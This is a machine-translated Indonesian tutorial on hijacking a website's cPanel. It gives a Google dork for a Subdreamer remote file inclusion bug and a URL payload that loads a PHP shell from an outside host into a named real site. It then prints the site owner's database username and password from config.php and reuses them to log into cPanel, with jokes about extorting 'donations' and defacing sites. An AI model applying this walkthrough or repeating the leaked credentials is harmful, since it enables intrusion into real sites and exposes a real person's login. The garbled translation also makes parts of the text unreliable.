Hacking Cpanel Dengan C99
Is it Cpanel? Cpanel is the center of management web site, CPanel or fancy term Control Panel is where web admin for setting up full and the control of the web to be made or the term is cpanel = house is still empty yet nothing, well that's where it later will be filled furnishings to complement the contents of the house, Cpanel same as home, and furniture can be categorized as a web script, script mail, scripts MySql, etc. Does cPanel is so important and valuable? Yups a good question the answer is YES, because if cpanel in a site can be entered by the hacker it can be ascertained that the target web are in control of the hacker [sorry I'm not a hacker J] or if dilogikakan same if the home we succeed in kuasain others then certainly the other person can enter at any time to our house. but are easy to house our people can go home us while our house there is a security that is KEY, Yups tantamount to cpanel is not as easy as we imagine due to enter the area cpanel requires a key that username and password, if not then you certainly will not be able to entry into the cpanel area. Our logic is clear enough to think, so now back again to the subject matter, the author will explain the takeover cpanel web against targets wearing the fault of the script logic programming and the mistakes of the web admin, J
btw we start authors will take a bug in php script with the brand 'subdreamer' [could diliat in www.subdreamer.com], bugs are: /skins/advanced/advanced2.php?pluginpath[0]= to file the problem is advanced2.php, we will try to find a target by wearing uncle google.com with the syntax: inurl: 'skins / advanced / advanced1.php?', the authors take the example of overseas sites [previously been members announcing their mail to the appropriate bug ethical hacker] J, namely: http://www.cafesjakie.nl
We are trying to do penetration to the target site, using phpshell it will get results:
http://www.cafesjakie.nl/skins/advanced/advanced2.php?pluginpath[0]= http://ernigalak.t35.com/mama.txt? It will be the result appears as below:
Ok's we managed to get through the back [backdoor] but we have not got access to major [cpanel] can only be entered through the back door, so we try to find where the location of the main access [cpanel], note one by one the existing file, we can see at the top of the file phpshell us
That the target was in position safe-mode: OFF, and there we can see uid: 65534 (nobody) gid = 65534 (nobody) groups = 65534 (nobody) by the user: gbremmer, good a good start for us trying to find access cpanel web this target [if not understand uid, gid, groups can learn the OS is based on open source like Linux, I love linux], further consider the above there is file / home / gremmer / public_html / skins / advanced, we will try gain access to cpanel try to go to the main page of the target web, click the folder public_html or if you are a web admin, folder public_html = www, then it will get the results below:
Look carefully at these folders, we would think logically that to connect the database requires a username and password, usually the location of both are in the file config.php, configuration.php, koneksi.php [depending on the maker of the script], the authors try we will click on the folder includes [usually default location in the script subdreamer config.php in the includes folder], then it will get results:
Note that there is a second file config.php and config.php.new, btw we can see its 2nd, only difference is that his problem byte [possibility config.php.new only to update only], then klikconfig.php will be the result:
Blah noticed again in the config.php file we can see the complete user databse with passwornya, Only here we are not going to get into that database because we will try to gain access to cpanel web main targets, look carefully at $ dbname = gbremmer_subdreamer
$ dbusername = gbremmer_subdrea, so logically gbremmer is the name of that user and behind him is the default name of hosting, and note once again file $ dbpassword = hiervomgb, is from the user's password is to enter into the Web database targets, stop, question whether we cpanel could get into those targets? good question, here the author would invite you to think logically, do you ever feel safe to carry out activities in cyberspace [internet]? To the layman maybe this is a stupid question, maybe people will think will be safe and comfortable for the business world of the Internet [nearly 80% who said so, so as to affairs password is only one password for many purposes] J, because we think so then where lies fault of our own [never want to know for security affairs in the internet], so back to the root of the problem, we would think the reverse of most laymen, we will try to use the user name: gbremmer and password: hiervomgb to get the main access from cpanel targets The.
Let's open the URL: http://www.cafesjakie.nl/cpanel, clay cpanel pages protected by user name and password,
Confused right? J, we will try to enter the username and password that we can from the config.php file
Blar liatlah we can enter the target cpanel, it can perform full admin control terhadapa is only to capitalize logic without having to laboriously J for wearing an error of logic programming script and from the admin [when the writer is also one of the web admin diwww.sekuritionline.net ]
- Learning to be a hacker is something fun that is difficult is ethics -nya- - When successfully entered the target web to try to let them know the relevant parties in order to do a patch on the web [all requested donation via e-gold] J xixixixiix
- Make hacking is art do not destroy [except if trapped] J just kidding J
- Embed to ourselves that for the virtual world affairs ga guarantee pure 100% safe, Xixi so remember the motto of the SO team [Secure Nothing in the world or in this world nothing is safe or in the sky there is heaven] J
- Make learning to hit its web admin when hit deface ga not reported to the authorities [ntar instead ngeluarin much money JJJ
- To do the admin always patch updates automatically or manually, and do data backup web teraturJ] we should be grateful that the web we are reminded by the hackers, [instead of being angry - angry and talking on TV -TV] that web price is above 200 million could be said to be safe [author also admin web tablets ntar in protest]
Greatz: Allah that gives life and death, My heart Erniku dear [uda officially became the wife] hope a speedy recovery would have a baby neh gue J, colleagues in SO te @ m, Bastard Crew, adhietslank, thesims, fabricate, Jayoes, a -tech, jantap, babypunk, Lieutenant, k1n9kong, setiawan, stove ^ meleduk, kabrut, saleho [rahmad pious], pomponk, blindboy, dave, Sonix, ariee, tommy ^ singers, Orgil, Hilda ^ inside, Rini, or the ga can mention [thanks all who participated in the summit digaht SO], all people underground, channel Hacker, Cracker, Carder, in Dalnet, mildnet, realunix, thanks upon learning J
Note :
